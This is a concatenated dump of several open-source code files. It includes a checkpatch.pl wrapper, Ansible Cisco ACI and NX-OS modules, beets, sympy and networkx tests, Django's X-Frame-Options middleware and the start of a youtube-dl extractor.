    """Locate the checkpatch.pl script.

    Searches the current directory, its grandparent, the tree's tools/ and
    scripts/ directories and ~/bin; failing that, walks up from ~/bin looking
    for a Chrome OS kernel checkout.  Exits the program if nothing is found.

    Returns:
        Full path to checkpatch.pl
    """
    top_level = gitutil.GetTopLevel()
    try_list = [
        os.getcwd(),
        os.path.join(os.getcwd(), '..', '..'),
        os.path.join(top_level, 'tools'),
        os.path.join(top_level, 'scripts'),
        '%s/bin' % os.getenv('HOME'),
        ]
    # Look in current dir
    for path in try_list:
        fname = os.path.join(path, 'checkpatch.pl')
        if os.path.isfile(fname):
            return fname

    # Look upwards for a Chrome OS tree
    # (note: 'path' here is the last entry of try_list, i.e. ~/bin)
    while not os.path.ismount(path):
        fname = os.path.join(path, 'src', 'third_party', 'kernel', 'files',
                             'scripts', 'checkpatch.pl')
        if os.path.isfile(fname):
            return fname
        path = os.path.dirname(path)

    print >> sys.stderr, ('Cannot find checkpatch.pl - please put it in your ' +
                          '~/bin directory or use --no-check')
    sys.exit(1)
def CheckPatch(fname, verbose=False):
"""Run checkpatch.pl on a file.
Returns:
namedtuple containing:
ok: False=failure, True=ok
problems: List of problems, each a dict:
'type'; error or warning
'msg': text message
'file' : filename
'line': line number
errors: Number of errors
warnings: Number of warnings
checks: Number of checks
lines: Number of lines
stdout: Full output of checkpatch
"""
fields = ['ok', 'problems', 'errors', 'warnings', 'checks', 'lines',
'stdout']
result = collections.namedtuple('CheckPatchResult', fields)
result.ok = False
result.errors, result.warning, result.checks = 0, 0, 0
result.lines = 0
result.problems = []
chk = FindCheckPatch()
item = {}
result.stdout = command.Output(chk, '--no-tree', fname)
#pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE)
#stdout, stderr = pipe.communicate()
# total: 0 errors, 0 warnings, 159 lines checked
# or:
# total: 0 errors, 2 warnings, 7 checks, 473 lines checked
re_stats = re.compile('total: (\\d+) errors, (\d+) warnings, (\d+)')
re_stats_full = re.compile('total: (\\d+) errors, (\d+) warnings, (\d+)'
' checks, (\d+)')
re_ok = re.compile('.*has no obvious style problems')
re_bad = re.compile('.*has style problems, please review')
re_error = re.compile('ERROR: (.*)')
re_warning = re.compile('WARNING: (.*)')
re_check = re.compile('CHECK: (.*)')
re_file = re.compile('#\d+: FILE: ([^:]*):(\d+):')
for line in result.stdout.splitlines():
if verbose:
print line
# A blank line indicates the end of a message
if not line and item:
result.problems.append(item)
item = {}
match = re_stats_full.match(line)
if not match:
match = re_stats.match(line)
if match:
result.errors = int(match.group(1))
result.warnings = int(match.group(2))
if len(match.groups()) == 4:
result.checks = int(match.group(3))
result.lines = int(match.group(4))
else:
result.lines = int(match.group(3))
elif re_ok.match(line):
result.ok = True
elif re_bad.match(line):
result.ok = False
err_match = re_error.match(line)
warn_match = re_warning.match(line)
file_match = re_file.match(line)
check_match = re_check.match(line)
if err_match:
item['msg'] = err_match.group(1)
item['type'] = 'error'
elif warn_match:
item['msg'] = warn_match.group(1)
item['type'] = 'warning'
elif check_match:
item['msg'] = check_match.group(1)
item['type'] = 'check'
elif file_match:
item['file'] = file_match.group(1)
item['line'] = int(file_match.group(2))
return result
def GetWarningMsg(col, msg_type, fname, line, msg):
    '''Create a message for a given file/line

    Args:
        col: terminal colour object providing Color() and colour constants
        msg_type: Message type ('error', 'warning' or 'check'); any other
            value is passed through uncoloured
        fname: Filename which reports the problem
        line: Line number where it was noticed
        msg: Message to report

    Returns:
        The formatted message string
    '''
    severity_colors = {
        'warning': col.YELLOW,
        'error': col.RED,
        'check': col.MAGENTA,
    }
    if msg_type in severity_colors:
        msg_type = col.Color(severity_colors[msg_type], msg_type)
    return '%s: %s,%d: %s' % (msg_type, fname, line, msg)
def CheckPatches(verbose, args):
'''Run the checkpatch.pl script on each patch'''
error_count, warning_count, check_count = 0, 0, 0
col = terminal.Color()
for fname in args:
result = CheckPatch(fname, verbose)
if not result.ok:
error_count += result.errors
warning_count += result.warnings
check_count += result.checks
print '%d errors, %d warnings, %d checks for %s:' % (result.errors,
result.warnings, result.checks, col.Color(col.BLUE, fname))
if (len(result.problems) != result.errors + result.warnings +
result.checks):
print "Internal error: some problems lost"
for item in result.problems:
print GetWarningMsg(col, item.get('type', '<unknown>'),
item.get('file', '<unknown>'),
item.get('line', 0), item.get('msg', 'message'))
print
#print stdout
if error_count or warning_count or check_count:
str = 'checkpatch.pl found %d error(s), %d warning(s), %d checks(s)'
color = col.GREEN
if warning_count:
color = col.YELLOW
if error_count:
color = col.RED
print col.Color(color, str % (error_count, warning_count, check_count))
return False
return True
| gpl-2.0 |
ujenmr/ansible | lib/ansible/modules/network/aci/aci_tenant_action_rule_profile.py | 27 | 6462 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: aci_tenant_action_rule_profile
short_description: Manage action rule profiles (rtctrl:AttrP)
description:
- Manage action rule profiles on Cisco ACI fabrics.
version_added: '2.4'
options:
action_rule:
description:
- The name of the action rule profile.
type: str
aliases: [ action_rule_name, name ]
description:
description:
- The description for the action rule profile.
type: str
aliases: [ descr ]
tenant:
description:
- The name of the tenant.
type: str
aliases: [ tenant_name ]
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
type: str
choices: [ absent, present, query ]
default: present
extends_documentation_fragment: aci
notes:
- The C(tenant) used must exist before using this module in your playbook.
The M(aci_tenant) module can be used for this.
seealso:
- module: aci_tenant
- name: APIC Management Information Model reference
description: More information about the internal APIC class B(rtctrl:AttrP).
link: https://developer.cisco.com/docs/apic-mim-ref/
author:
- Dag Wieers (@dagwieers)
'''
# FIXME: Add more, better examples
EXAMPLES = r'''
- aci_tenant_action_rule_profile:
host: apic
username: admin
password: SomeSecretPassword
action_rule: '{{ action_rule }}'
description: '{{ descr }}'
tenant: '{{ tenant }}'
delegate_to: localhost
'''
RETURN = r'''
current:
description: The existing configuration from the APIC after the module has finished
returned: success
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
error:
description: The error information as returned from the APIC
returned: failure
type: dict
sample:
{
"code": "122",
"text": "unknown managed object class foo"
}
raw:
description: The raw output returned by the APIC REST API (xml or json)
returned: parse error
type: str
sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>'
sent:
description: The actual/minimal configuration pushed to the APIC
returned: info
type: list
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment"
}
}
}
previous:
description: The original configuration from the APIC before the module has started
returned: info
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
proposed:
description: The assembled configuration from the user-provided parameters
returned: info
type: dict
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"name": "production"
}
}
}
filter_string:
description: The filter string used for the request
returned: failure or debug
type: str
sample: ?rsp-prop-include=config-only
method:
description: The HTTP method used for the request to the APIC
returned: failure or debug
type: str
sample: POST
response:
description: The HTTP response from the APIC
returned: failure or debug
type: str
sample: OK (30 bytes)
status:
description: The HTTP status from the APIC
returned: failure or debug
type: int
sample: 200
url:
description: The HTTP url used for the request to the APIC
returned: failure or debug
type: str
sample: https://10.11.12.13/api/mo/uni/tn-production.json
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec
def main():
    """Module entry point: create, delete or query a tenant action rule
    profile (APIC class rtctrl:AttrP) via the ACI REST helper."""
    argument_spec = aci_argument_spec()
    argument_spec.update(
        action_rule=dict(type='str', aliases=['action_rule_name', 'name']),  # Not required for querying all objects
        tenant=dict(type='str', aliases=['tenant_name']),  # Not required for querying all objects
        description=dict(type='str', aliases=['descr']),
        state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
    )

    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
        # Both the rule name and its tenant are mandatory when creating
        # or deleting; only 'query' can run without them.
        required_if=[
            ['state', 'absent', ['action_rule', 'tenant']],
            ['state', 'present', ['action_rule', 'tenant']],
        ],
    )

    action_rule = module.params['action_rule']
    description = module.params['description']
    state = module.params['state']
    tenant = module.params['tenant']

    aci = ACIModule(module)
    # The action rule profile (rtctrlAttrP) is a child of its tenant
    # (fvTenant) in the APIC object tree.
    aci.construct_url(
        root_class=dict(
            aci_class='fvTenant',
            aci_rn='tn-{0}'.format(tenant),
            module_object=tenant,
            target_filter={'name': tenant},
        ),
        subclass_1=dict(
            aci_class='rtctrlAttrP',
            aci_rn='attr-{0}'.format(action_rule),
            module_object=action_rule,
            target_filter={'name': action_rule},
        ),
    )

    aci.get_existing()

    if state == 'present':
        # Push only the difference between desired and existing config
        aci.payload(
            aci_class='rtctrlAttrP',
            class_config=dict(
                name=action_rule,
                descr=description,
            ),
        )
        aci.get_diff(aci_class='rtctrlAttrP')
        aci.post_config()

    elif state == 'absent':
        aci.delete_config()

    aci.exit_json()


if __name__ == "__main__":
    main()
| gpl-3.0 |
aioue/ansible | lib/ansible/modules/network/nxos/nxos_smu.py | 40 | 5987 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: nxos_smu
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Perform SMUs on Cisco NX-OS devices.
description:
- Perform software maintenance upgrades (SMUs) on Cisco NX-OS devices.
author: Gabriele Gerbino (@GGabriele)
notes:
- The module can only activate and commit a package,
not remove or deactivate it.
- Use C(transport=nxapi) to avoid connection timeout
options:
pkg:
description:
- Name of the remote package.
required: true
file_system:
description:
- The remote file system of the device. If omitted,
devices that support a file_system parameter will use
their default values.
required: false
default: null
'''
EXAMPLES = '''
- nxos_smu:
pkg: "nxos.CSCuz65185-n9k_EOR-1.0.0-7.0.3.I2.2d.lib32_n9000.rpm"
username: "{{ un }}"
password: "{{ pwd }}"
host: "{{ inventory_hostname }}"
'''
RETURN = '''
file_system:
description: The remote file system of the device.
returned: always
type: string
sample: "bootflash:"
pkg:
description: Name of the remote package
type: string
returned: always
sample: "nxos.CSCuz65185-n9k_EOR-1.0.0-7.0.3.I2.2d.lib32_n9000.rpm"
updates:
description: commands sent to the device
returned: always
type: list
sample: ["install add bootflash:nxos.CSCuz65185-n9k_EOR-1.0.0-7.0.3.I2.2d.lib32_n9000.rpm",
"install activate bootflash:nxos.CSCuz65185-n9k_EOR-1.0.0-7.0.3.I2.2d.lib32_n9000.rpm force",
"install commit bootflash:nxos.CSCuz65185-n9k_EOR-1.0.0-7.0.3.I2.2d.lib32_n9000.rpm"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
from ansible.module_utils.nxos import get_config, load_config, run_commands
from ansible.module_utils.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
import time
import collections
import re
import re
def execute_show_command(command, module, command_type='cli_show'):
    """Run a single show command on the device and return the response body.

    NOTE(review): both transport branches are identical (command_type is
    never used), and for any transport other than 'cli'/'nxapi' the 'body'
    variable would be unbound -- confirm whether the branches can be
    collapsed or an explicit error added.
    """
    if module.params['transport'] == 'cli':
        cmds = [command]
        body = run_commands(module, cmds)
    elif module.params['transport'] == 'nxapi':
        cmds = [command]
        body = run_commands(module, cmds)
    return body
def remote_file_exists(module, dst, file_system='bootflash:'):
    """Return True if *dst* is present on the device's *file_system*."""
    listing = execute_show_command(
        'dir {0}/{1}'.format(file_system, dst), module,
        command_type='cli_show_ascii')
    # The device reports 'No such file' when the path does not exist.
    return 'No such file' not in listing[0]
def apply_patch(module, commands):
    """Apply each install command in sequence, failing fast on error.

    Bug fix: the original checked an undefined name 'response' after the
    loop (a guaranteed NameError); the result of each load_config call is
    now captured and checked per command.
    """
    for command in commands:
        response = load_config(module, [command])
        # Give the install machinery time to settle between steps
        time.sleep(5)
        if response and 'failed' in response:
            module.fail_json(msg="Operation failed!", response=response)
def get_commands(module, pkg, file_system):
    """Build the ordered list of install commands still needed for *pkg*.

    Only the steps (add / activate / commit) whose state the device does not
    already report are emitted.
    """
    def show(command):
        # All three queries use the same ascii show-command plumbing.
        return execute_show_command(command, module,
                                    command_type='cli_show_ascii')[0]

    # Package name with its trailing extension stripped, as the device
    # reports it in the install listings.
    base_pkg = '.'.join(pkg.split('.')[:-1])
    target = '{0}{1}'.format(file_system, pkg)

    inactive = show('show install inactive')
    active = show('show install active')
    committed = show('show install committed')

    commands = []
    if base_pkg not in inactive and base_pkg not in active:
        commands.append('install add ' + target)
    if base_pkg not in active:
        commands.append('install activate ' + target + ' force')
    if base_pkg not in committed:
        commands.append('install commit ' + target)
    return commands
def main():
    """Ansible module entry point.

    Validates that the requested package exists on the device, computes
    the outstanding install commands and applies them (unless running in
    check mode), then reports the result via ``exit_json``.
    """
    spec = dict(
        pkg=dict(required=True),
        file_system=dict(required=False, default='bootflash:'),
        include_defaults=dict(default=False),
        config=dict(),
        save=dict(type='bool', default=False)
    )
    spec.update(nxos_argument_spec)

    module = AnsibleModule(argument_spec=spec, supports_check_mode=True)

    warnings = list()
    check_args(module, warnings)

    pkg = module.params['pkg']
    file_system = module.params['file_system']

    if not remote_file_exists(module, pkg, file_system=file_system):
        module.fail_json(msg="The requested package doesn't exist "
                             "on the device")

    commands = get_commands(module, pkg, file_system)
    changed = False
    if commands and not module.check_mode:
        apply_patch(module, commands)
        changed = True

    # Drop a leading 'configure' command from the reported updates.
    if 'configure' in commands:
        commands.pop(0)

    module.exit_json(changed=changed,
                     pkg=pkg,
                     file_system=file_system,
                     updates=commands)


if __name__ == '__main__':
    main()
| gpl-3.0 |
TathagataChakraborti/resource-conflicts | PLANROB-2015/seq-sat-lama/Python-2.5.2/Lib/plat-mac/lib-scriptpackages/SystemEvents/Hidden_Suite.py | 82 | 1253 | """Suite Hidden Suite: Hidden Terms and Events for controlling the System Events application
Level 1, version 1
Generated from /System/Library/CoreServices/System Events.app
AETE/AEUT resource version 1/0, language 0, script 0
"""
import aetools
import MacOS
_code = 'tpnm'
from StdSuites.Type_Names_Suite import *
class Hidden_Suite_Events(Type_Names_Suite_Events):
    # NOTE(review): machine-generated Python 2 code (old-style `raise X, y`
    # and dict.has_key); regeneration, not hand-editing, is the intended
    # maintenance path for this file.

    def do_script(self, _object, _attributes={}, **_arguments):
        """do script: Execute an OSA script.
        Required argument: the object for the command
        Keyword argument _attributes: AppleEvent attribute dictionary
        """
        _code = 'misc'
        _subcode = 'dosc'

        # This event accepts no optional parameters beyond the direct object.
        if _arguments: raise TypeError, 'No optional args expected'
        _arguments['----'] = _object

        _reply, _arguments, _attributes = self.send(_code, _subcode,
                _arguments, _attributes)
        # 'errn' carries the Apple Event error number when the call failed.
        if _arguments.get('errn', 0):
            raise aetools.Error, aetools.decodeerror(_arguments)
        # XXXX Optionally decode result
        # '----' holds the direct-object result, when one was returned.
        if _arguments.has_key('----'):
            return _arguments['----']
#
# Indices of types declared in this module
#
_classdeclarations = {
}
_propdeclarations = {
}
_compdeclarations = {
}
_enumdeclarations = {
}
| mit |
untitaker/beets | test/test_importadded.py | 25 | 7186 | # This file is part of beets.
# Copyright 2015, Stig Inge Lea Bjornsen.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
from __future__ import (division, absolute_import, print_function,
unicode_literals)
"""Tests for the `importadded` plugin."""
import os
from test._common import unittest
from test.test_importer import ImportHelper, AutotagStub
from beets import importer
from beets import util
from beetsplug.importadded import ImportAddedPlugin
_listeners = ImportAddedPlugin.listeners
def preserve_plugin_listeners():
    """Preserve the initial plugin listeners as they would otherwise be
    deleted after the first setup / tear down cycle.
    """
    # Restore the snapshot taken at import time if the registry was cleared.
    ImportAddedPlugin.listeners = ImportAddedPlugin.listeners or _listeners
def modify_mtimes(paths, offset=-60000):
    """Shift each file's mtime by ``offset * position`` seconds.

    Positions are 1-based, so every path in *paths* ends up with a
    distinct modification time.  Access times are left unchanged.
    """
    for position, p in enumerate(paths, start=1):
        st = os.stat(p)
        os.utime(p, (st.st_atime, st.st_mtime + offset * position))
class ImportAddedTest(unittest.TestCase, ImportHelper):
    """Verify that the importadded plugin stamps `added` dates from file
    mtimes for album and singleton imports, and leaves them intact on
    reimport."""

    # The minimum mtime of the files to be imported
    min_mtime = None

    def setUp(self):
        preserve_plugin_listeners()
        self.setup_beets()
        self.load_plugins('importadded')
        self._create_import_dir(2)
        # Different mtimes on the files to be imported in order to test the
        # plugin
        modify_mtimes((mfile.path for mfile in self.media_files))
        self.min_mtime = min(os.path.getmtime(mfile.path)
                             for mfile in self.media_files)
        self.matcher = AutotagStub().install()
        # Bug fix: this previously assigned to a misspelled attribute
        # ("macthin"), so the stub's match quality was never configured.
        self.matcher.matching = AutotagStub.GOOD
        self._setup_import_session()
        self.importer.add_choice(importer.action.APPLY)

    def tearDown(self):
        self.unload_plugins()
        self.teardown_beets()
        self.matcher.restore()

    def findMediaFile(self, item):
        """Find the pre-import MediaFile for an Item"""
        for m in self.media_files:
            if m.title.replace('Tag', 'Applied') == item.title:
                return m
        raise AssertionError("No MediaFile found for Item " +
                             util.displayable_path(item.path))

    def assertEqualTimes(self, first, second, msg=None):
        """For comparing file modification times at a sufficient precision"""
        self.assertAlmostEqual(first, second, places=4, msg=msg)

    def assertAlbumImport(self):
        """Run the import and check album/items were stamped with the
        minimum source-file mtime."""
        self.importer.run()
        album = self.lib.albums().get()
        self.assertEqual(album.added, self.min_mtime)
        for item in album.items():
            self.assertEqual(item.added, self.min_mtime)

    def test_import_album_with_added_dates(self):
        self.assertAlbumImport()

    def test_import_album_inplace_with_added_dates(self):
        self.config['import']['copy'] = False
        self.config['import']['move'] = False
        self.config['import']['link'] = False
        self.assertAlbumImport()

    def test_import_album_with_preserved_mtimes(self):
        self.config['importadded']['preserve_mtimes'] = True
        self.importer.run()
        album = self.lib.albums().get()
        self.assertEqual(album.added, self.min_mtime)
        for item in album.items():
            self.assertEqualTimes(item.added, self.min_mtime)
            mediafile_mtime = os.path.getmtime(self.findMediaFile(item).path)
            self.assertEqualTimes(item.mtime, mediafile_mtime)
            self.assertEqualTimes(os.path.getmtime(item.path),
                                  mediafile_mtime)

    def test_reimported_album_skipped(self):
        # Import and record the original added dates
        self.importer.run()
        album = self.lib.albums().get()
        album_added_before = album.added
        items_added_before = dict((item.path, item.added)
                                  for item in album.items())
        # Newer Item path mtimes as if Beets had modified them
        modify_mtimes(items_added_before.keys(), offset=10000)
        # Reimport
        self._setup_import_session(import_dir=album.path)
        self.importer.run()
        # Verify the reimported items
        album = self.lib.albums().get()
        self.assertEqualTimes(album.added, album_added_before)
        items_added_after = dict((item.path, item.added)
                                 for item in album.items())
        for item_path, added_after in items_added_after.iteritems():
            self.assertEqualTimes(items_added_before[item_path], added_after,
                                  "reimport modified Item.added for " +
                                  item_path)

    def test_import_singletons_with_added_dates(self):
        self.config['import']['singletons'] = True
        self.importer.run()
        for item in self.lib.items():
            mfile = self.findMediaFile(item)
            self.assertEqualTimes(item.added, os.path.getmtime(mfile.path))

    def test_import_singletons_with_preserved_mtimes(self):
        self.config['import']['singletons'] = True
        self.config['importadded']['preserve_mtimes'] = True
        self.importer.run()
        for item in self.lib.items():
            mediafile_mtime = os.path.getmtime(self.findMediaFile(item).path)
            self.assertEqualTimes(item.added, mediafile_mtime)
            self.assertEqualTimes(item.mtime, mediafile_mtime)
            self.assertEqualTimes(os.path.getmtime(item.path),
                                  mediafile_mtime)

    def test_reimported_singletons_skipped(self):
        self.config['import']['singletons'] = True
        # Import and record the original added dates
        self.importer.run()
        items_added_before = dict((item.path, item.added)
                                  for item in self.lib.items())
        # Newer Item path mtimes as if Beets had modified them
        modify_mtimes(items_added_before.keys(), offset=10000)
        # Reimport
        import_dir = os.path.dirname(items_added_before.keys()[0])
        self._setup_import_session(import_dir=import_dir, singletons=True)
        self.importer.run()
        # Verify the reimported items
        items_added_after = dict((item.path, item.added)
                                 for item in self.lib.items())
        for item_path, added_after in items_added_after.iteritems():
            self.assertEqualTimes(items_added_before[item_path], added_after,
                                  "reimport modified Item.added for " +
                                  item_path)
def suite():
    """Collect this module's tests for the standard unittest runner."""
    loader = unittest.TestLoader()
    return loader.loadTestsFromName(__name__)
# Compare against a text literal: under Python 3, __name__ is str and the
# former b'__main__' bytes literal could never match, silently disabling
# direct execution.  With unicode_literals on Python 2 the text comparison
# still matches the native str __name__.
if __name__ == '__main__':
    unittest.main(defaultTest='suite')
| mit |
antepsis/anteplahmacun | sympy/categories/tests/test_baseclasses.py | 98 | 5704 | from sympy.categories import (Object, Morphism, IdentityMorphism,
NamedMorphism, CompositeMorphism,
Diagram, Category)
from sympy.categories.baseclasses import Class
from sympy.utilities.pytest import raises
from sympy import FiniteSet, EmptySet, Dict, Tuple
def test_morphisms():
A = Object("A")
B = Object("B")
C = Object("C")
D = Object("D")
# Test the base morphism.
f = NamedMorphism(A, B, "f")
assert f.domain == A
assert f.codomain == B
assert f == NamedMorphism(A, B, "f")
# Test identities.
id_A = IdentityMorphism(A)
id_B = IdentityMorphism(B)
assert id_A.domain == A
assert id_A.codomain == A
assert id_A == IdentityMorphism(A)
assert id_A != id_B
# Test named morphisms.
g = NamedMorphism(B, C, "g")
assert g.name == "g"
assert g != f
assert g == NamedMorphism(B, C, "g")
assert g != NamedMorphism(B, C, "f")
# Test composite morphisms.
assert f == CompositeMorphism(f)
k = g.compose(f)
assert k.domain == A
assert k.codomain == C
assert k.components == Tuple(f, g)
assert g * f == k
assert CompositeMorphism(f, g) == k
assert CompositeMorphism(g * f) == g * f
# Test the associativity of composition.
h = NamedMorphism(C, D, "h")
p = h * g
u = h * g * f
assert h * k == u
assert p * f == u
assert CompositeMorphism(f, g, h) == u
# Test flattening.
u2 = u.flatten("u")
assert isinstance(u2, NamedMorphism)
assert u2.name == "u"
assert u2.domain == A
assert u2.codomain == D
# Test identities.
assert f * id_A == f
assert id_B * f == f
assert id_A * id_A == id_A
assert CompositeMorphism(id_A) == id_A
# Test bad compositions.
raises(ValueError, lambda: f * g)
raises(TypeError, lambda: f.compose(None))
raises(TypeError, lambda: id_A.compose(None))
raises(TypeError, lambda: f * None)
raises(TypeError, lambda: id_A * None)
raises(TypeError, lambda: CompositeMorphism(f, None, 1))
raises(ValueError, lambda: NamedMorphism(A, B, ""))
raises(NotImplementedError, lambda: Morphism(A, B))
def test_diagram():
A = Object("A")
B = Object("B")
C = Object("C")
f = NamedMorphism(A, B, "f")
g = NamedMorphism(B, C, "g")
id_A = IdentityMorphism(A)
id_B = IdentityMorphism(B)
empty = EmptySet()
# Test the addition of identities.
d1 = Diagram([f])
assert d1.objects == FiniteSet(A, B)
assert d1.hom(A, B) == (FiniteSet(f), empty)
assert d1.hom(A, A) == (FiniteSet(id_A), empty)
assert d1.hom(B, B) == (FiniteSet(id_B), empty)
assert d1 == Diagram([id_A, f])
assert d1 == Diagram([f, f])
# Test the addition of composites.
d2 = Diagram([f, g])
homAC = d2.hom(A, C)[0]
assert d2.objects == FiniteSet(A, B, C)
assert g * f in d2.premises.keys()
assert homAC == FiniteSet(g * f)
# Test equality, inequality and hash.
d11 = Diagram([f])
assert d1 == d11
assert d1 != d2
assert hash(d1) == hash(d11)
d11 = Diagram({f: "unique"})
assert d1 != d11
# Make sure that (re-)adding composites (with new properties)
# works as expected.
d = Diagram([f, g], {g * f: "unique"})
assert d.conclusions == Dict({g * f: FiniteSet("unique")})
# Check the hom-sets when there are premises and conclusions.
assert d.hom(A, C) == (FiniteSet(g * f), FiniteSet(g * f))
d = Diagram([f, g], [g * f])
assert d.hom(A, C) == (FiniteSet(g * f), FiniteSet(g * f))
# Check how the properties of composite morphisms are computed.
d = Diagram({f: ["unique", "isomorphism"], g: "unique"})
assert d.premises[g * f] == FiniteSet("unique")
# Check that conclusion morphisms with new objects are not allowed.
d = Diagram([f], [g])
assert d.conclusions == Dict({})
# Test an empty diagram.
d = Diagram()
assert d.premises == Dict({})
assert d.conclusions == Dict({})
assert d.objects == empty
# Check a SymPy Dict object.
d = Diagram(Dict({f: FiniteSet("unique", "isomorphism"), g: "unique"}))
assert d.premises[g * f] == FiniteSet("unique")
# Check the addition of components of composite morphisms.
d = Diagram([g * f])
assert f in d.premises
assert g in d.premises
# Check subdiagrams.
d = Diagram([f, g], {g * f: "unique"})
d1 = Diagram([f])
assert d.is_subdiagram(d1)
assert not d1.is_subdiagram(d)
d = Diagram([NamedMorphism(B, A, "f'")])
assert not d.is_subdiagram(d1)
assert not d1.is_subdiagram(d)
d1 = Diagram([f, g], {g * f: ["unique", "something"]})
assert not d.is_subdiagram(d1)
assert not d1.is_subdiagram(d)
d = Diagram({f: "blooh"})
d1 = Diagram({f: "bleeh"})
assert not d.is_subdiagram(d1)
assert not d1.is_subdiagram(d)
d = Diagram([f, g], {f: "unique", g * f: "veryunique"})
d1 = d.subdiagram_from_objects(FiniteSet(A, B))
assert d1 == Diagram([f], {f: "unique"})
raises(ValueError, lambda: d.subdiagram_from_objects(FiniteSet(A,
Object("D"))))
raises(ValueError, lambda: Diagram({IdentityMorphism(A): "unique"}))
def test_category():
    """Smoke-test Category construction: name, object Class and the
    commutative-diagram set, plus rejection of an empty name."""
    A = Object("A")
    B = Object("B")
    C = Object("C")

    f = NamedMorphism(A, B, "f")
    g = NamedMorphism(B, C, "g")

    d1 = Diagram([f, g])
    d2 = Diagram([f])

    objects = d1.objects | d2.objects

    K = Category("K", objects, commutative_diagrams=[d1, d2])

    assert K.name == "K"
    assert K.objects == Class(objects)
    assert K.commutative_diagrams == FiniteSet(d1, d2)

    # An empty category name is invalid.
    raises(ValueError, lambda: Category(""))
| bsd-3-clause |
katrid/django | django/middleware/clickjacking.py | 87 | 1988 | """
Clickjacking Protection Middleware.
This module provides a middleware that implements protection against a
malicious site loading resources from your site in a hidden frame.
"""
from django.conf import settings
class XFrameOptionsMiddleware(object):
    """
    Middleware that sets the X-Frame-Options HTTP header in HTTP responses.

    Does not set the header if it's already set or if the response contains
    a xframe_options_exempt value set to True.

    By default, sets the X-Frame-Options header to 'SAMEORIGIN', meaning the
    response can only be loaded on a frame within the same site. To prevent the
    response from being loaded in a frame in any site, set X_FRAME_OPTIONS in
    your project's Django settings to 'DENY'.

    Note: older browsers will quietly ignore this header, thus other
    clickjacking protection techniques should be used if protection in those
    browsers is required.

    http://en.wikipedia.org/wiki/Clickjacking#Server_and_client
    """
    def process_response(self, request, response):
        # Respect an existing header first, then the @xframe_options_exempt
        # flag; only when neither applies do we add our own header.
        if (response.get('X-Frame-Options') is None
                and not getattr(response, 'xframe_options_exempt', False)):
            response['X-Frame-Options'] = self.get_xframe_options_value(
                request, response)
        return response

    def get_xframe_options_value(self, request, response):
        """
        Gets the value to set for the X_FRAME_OPTIONS header.

        By default this uses the value from the X_FRAME_OPTIONS Django
        settings. If not found in settings, defaults to 'SAMEORIGIN'.

        This method can be overridden if needed, allowing it to vary based on
        the request or response.
        """
        return getattr(settings, 'X_FRAME_OPTIONS', 'SAMEORIGIN').upper()
| bsd-3-clause |
rafiqsaleh/VERCE | verce-hpc-pe/src/networkx/generators/tests/test_geometric.py | 88 | 1036 | #!/usr/bin/env python
from nose.tools import *
import networkx as nx
class TestGeneratorsGeometric():
    """Smoke tests for networkx's geometric graph generators: each
    generator must produce a graph with the requested node count, and the
    navigable-small-world generator must reduce to a grid when p=1, q=0."""

    def test_random_geometric_graph(self):
        G=nx.random_geometric_graph(50,0.25)
        assert_equal(len(G),50)

    def test_geographical_threshold_graph(self):
        G=nx.geographical_threshold_graph(50,100)
        assert_equal(len(G),50)

    def test_waxman_graph(self):
        G=nx.waxman_graph(50,0.5,0.1)
        assert_equal(len(G),50)
        # L=1 fixes the maximum distance instead of deriving it.
        G=nx.waxman_graph(50,0.5,0.1,L=1)
        assert_equal(len(G),50)

    def test_naviable_small_world(self):
        # NOTE: "naviable" typo kept — renaming would change test discovery.
        G = nx.navigable_small_world_graph(5,p=1,q=0)
        gg = nx.grid_2d_graph(5,5).to_directed()
        assert_true(nx.is_isomorphic(G,gg))

        G = nx.navigable_small_world_graph(5,p=1,q=0,dim=3)
        gg = nx.grid_graph([5,5,5]).to_directed()
        assert_true(nx.is_isomorphic(G,gg))

        G = nx.navigable_small_world_graph(5,p=1,q=0,dim=1)
        gg = nx.grid_graph([5]).to_directed()
        assert_true(nx.is_isomorphic(G,gg))
| mit |
remitamine/youtube-dl | youtube_dl/extractor/br.py | 30 | 11903 | # coding: utf-8
from __future__ import unicode_literals
import json
import re
from .common import InfoExtractor
from ..utils import (
determine_ext,
ExtractorError,
